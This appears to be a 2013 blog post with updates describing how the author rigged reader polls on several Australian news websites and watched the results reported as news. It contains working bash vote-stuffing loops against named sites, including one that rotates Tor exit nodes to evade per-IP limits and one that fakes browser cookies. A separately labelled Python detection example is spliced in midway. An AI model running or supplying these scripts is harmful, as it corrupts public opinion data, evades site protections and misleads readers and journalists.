[11/02/2013] Wow. This story just featured on ABC’s Media Watch. Click here (mirror) for their article (with video).
Last week, News Corporation ran a story (mirror) about the shock results of an online poll that indicated over 90% of the 16,000 respondents wanted to see a raise in speed limits, despite the poll being paired with an article asking motorists to slow down in consideration for elderly drivers.
Well, I have some news for you: Over 15,000 of those votes were mine.
And no, I didn’t cleverly infiltrate their systems and edit the poll by hand. That would have been rather illegal. The fact of the matter is, you can tweak any poll with relative ease without breaking any laws*. All you need to do is capitalise on the fact that there is nothing on their servers that will limit how many times or how often you vote.
I present to you, Exhibit A (mirror):
It’s one of many simple polls that appear from time to time on news.com.au. Vote once, and you can see the poll results. If you were wondering how much they put in place to stop you from voting again, clear your cookies and you’ll soon find that it’s essentially nothing. You could vote all day, but manual labour is for suckers. Install the “Tamper Data” Firefox plugin, and take a peek at the HTTP POST data that’s being sent to the server each time you vote:
Can you see where we’re going with this? Bash and Curl are your friends:
```bash
#!/bin/bash
while [ true ]; do
    curl --data "option=1226489732707&c=News_Poll&cid=1226489732697&pagename=Foundation%2FNews_Poll%2FsaveResult&site=NewsComAu&jsEnabled=true" http://www.news.com.au/cs/Satellite | grep total-votes
done
```
You could watch it run all day, or you can leave it ticking away while you sleep:
So there you have it. You can achieve a greater media influence in three lines of bash than Gina Rinehart could with an 18.7% share in Fairfax.
* I am not a lawyer. This is not legal advice.
UPDATE: Despite alerting NewsCorp to this, nobody seems to be listening. It appears that poll hacking is now my part-time hobby indefinitely.
An attempt to bring back the McGratin.
It was fun watching the anti-vaxxers and the skeptics argue over this poll result. In the end I called it a draw. One day later, a response (mirror) article was written:
I wonder when they’ll realise they’ve been had.
UPDATE 14/12/2012: There’s more.
Two stories hit the front page side-by-side today, both referencing my manipulated poll results. The first mentioned two polls which I had deadlocked. I didn’t notice (and balance) the middle poll until after an article had been written on it. However, at the time this article was published, all of the polls were in deadlock:
The second article didn’t only reference the poll, it formed the entire premise of the article. It has since been removed (19/12/2012) mirror.
THEY’VE MADE CONTACT!
Today, a colleague emailed one of the authors of one of the articles to ask if they were curious as to why their poll result was deadlocked… and we actually got a response! This was collectively our fourth attempt at contacting them, and we have again provided all of the details to date. As usual, after spilling the beans, we don’t get a response. However, two days later, the first Facebook poll appears. This may be a stop-gap measure while they fix their own system, or perhaps they’ve switched permanently; who knows.
In the meantime, let’s summarise my work to date with a montage:
It really shows my OCD side, doesn’t it?
UPDATE [19/12/2012]: Well, that escalated quickly (reddit helped). It appears that all references to polls (including the polls themselves) in the aforementioned articles have been removed. The articles which were based entirely on a poll result have been expunged entirely. I’ve put up mirrors for anyone who wants to see the originals. Still no word from NewsCorp. I’m just speculating here, but it looks like they’re sweeping the whole thing under the rug. Looking out my front window, there are no sightings of a party van.
UPDATE [14/01/2013]: So, I stopped gaming the polls on news.com.au after they noticed my blog and cleaned up their articles. I’d assumed that was the end of it.
I guess they haven’t learned much. In the meantime, I’ve expanded my exploit to actively crawl all seven of NewsCorp’s Australian online publications:
SMH were pretty quick to admit it when a Fairfax poll got hacked a year ago. The difference is that they actually fixed their polling system, and added a disclaimer. It seems NewsCorp need a little more of a nudge.
You know what? I think I’ll leave this running 24/7. Here’s a live view of the polls being deadlocked.
Your move, NewsCorp.
UPDATE [06/02/2013]: Four months after being notified, they appear to have limited the amount this can be exploited. After 10 votes in a short timespan, subsequent votes originating from the same IP address are rejected. While changing your IP address between votes isn’t an impossible task to automate (using a tor proxy), it’s still orders of magnitude more difficult to do than the original exploit.
UPDATE [11/02/2013]: I must admit, the new changes to NewsCorp’s polling system made it much harder to break. Instead of three lines of bash, it now takes eight!
To be fair, this brings their polling security in line with that of Fairfax, which I broke too. Here you can see how much I can sway a poll in 7 hours on a 64k (capped) internet connection:
It seems both sites limit the number of votes coming from a single IP. To circumvent it, just set up a tor proxy and jump to another exit node every 10 votes:
```bash
#!/bin/bash
while [ true ]; do
    COUNTER=0
    while [ $COUNTER -lt 10 ]; do
        curl --data "pollId=4016070&indexUrlPath=http%3A%2F%2Fwww.theage.com.au%2Fpolls%2Fopinion%2Ftarkine-wilderness-20130208-2e2ti.html%23poll&id=27263" -x "http://localhost:8118" --cookie "checkIfCookiesEnabled=cookiesEnabled; path=/" http://feedback.theage.com.au/action/voteForAPoll
        let COUNTER+=1
    done
    (echo authenticate '""'; echo signal newnym; echo quit) | nc localhost 9051
done
```
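Seen from the server side, the per-IP limit described in the 06/02/2013 update only counts votes per address, so it needs a second, per-poll signal to notice many addresses each spending their full allowance on the same option. The following is an added example, not code from the original post or from either publisher; the 600-second window, the five-address threshold, the `PollGuard` class, the poll id and the sample traffic are all assumptions constructed for illustration.

```python
from collections import defaultdict, deque

WINDOW_S = 600    # assumed length of the "short timespan"; the post gives no figure
PER_IP_CAP = 10   # per-IP cap reported in the post


class PollGuard:
    """Per-IP sliding-window cap plus a per-poll check for IPs that all hit the cap."""

    def __init__(self, window_s=WINDOW_S, cap=PER_IP_CAP, cluster_ips=5):
        self.window_s, self.cap, self.cluster_ips = window_s, cap, cluster_ips
        self.by_ip = defaultdict(deque)   # (poll, ip) -> timestamps of accepted votes
        self.capped = defaultdict(dict)   # (poll, option) -> {ip: time the cap was hit}

    def accept(self, ts, poll, ip, option):
        q = self.by_ip[(poll, ip)]
        while q and ts - q[0] >= self.window_s:   # drop votes older than the window
            q.popleft()
        if len(q) >= self.cap:
            return False                          # the server-side limit from the post
        q.append(ts)
        if len(q) == self.cap:                    # this IP spent its whole allowance
            self.capped[(poll, option)][ip] = ts
        return True

    def suspicious(self, poll, now):
        """Options for which >= cluster_ips addresses hit the cap within the window."""
        flagged = []
        for (p, option), ips in self.capped.items():
            recent = [ip for ip, ts in ips.items() if now - ts < self.window_s]
            if p == poll and len(recent) >= self.cluster_ips:
                flagged.append(option)
        return flagged


def replay_constructed_traffic():
    """Constructed sample traffic (documentation-range IPs, made-up poll id)."""
    guard = PollGuard()
    # 20 ordinary readers, one vote each, split across two options
    organic = [guard.accept(i, "poll-A", f"192.0.2.{i}", i % 2) for i in range(20)]
    # one address voting 15 times: the last 5 are refused by the per-IP cap
    single = [guard.accept(100 + i, "poll-A", "198.51.100.7", 1) for i in range(15)]
    # six addresses, ten votes each, same option: every vote passes the per-IP cap
    rotated = [guard.accept(200 + 10 * n + i, "poll-A", f"203.0.113.{n}", 1)
               for n in range(6) for i in range(10)]
    return organic, single, rotated, guard.suspicious("poll-A", now=300)
```

A flagged option is a reason to hold the result back from publication or require a stronger voter check, not proof of manipulation on its own.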
[UPDATE 27/06/2013]
I’ve been in hiatus for a while, but I spotted this one on Facebook and had to investigate:
There’s a few things wrong with this:
- They’re reporting on poll results like it’s a trustworthy source.
- Yes.
- The 7 News online polling system is NOT secure.
To demonstrate, this script will vote for Abbott repeatedly in the aforementioned poll:
```bash
#!/bin/bash
while [ true ]; do
    curl -j -c cookiefile -H "Accept-Encoding: gzip,deflate" -A "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0" http://au.news.yahoo.com/ > /dev/null
    curl -b cookiefile --data "vote={\"vote\":[\"2\"]}" http://au.news.yahoo.com/cloud/polls/vote?poll_id=3957b2bb-e3b4-3d5a-8d86-25229c0c5bba
done
```
I must admit, I was going around in circles for a solid hour before I figured out which cookie was required, and what I had to forward to the server to make it send it. At the end of the day, it’s a simple rinse-and-repeat process just like the others.
Their server is a bit of a pig, so you’ll need to get several threads happening to speed this one up.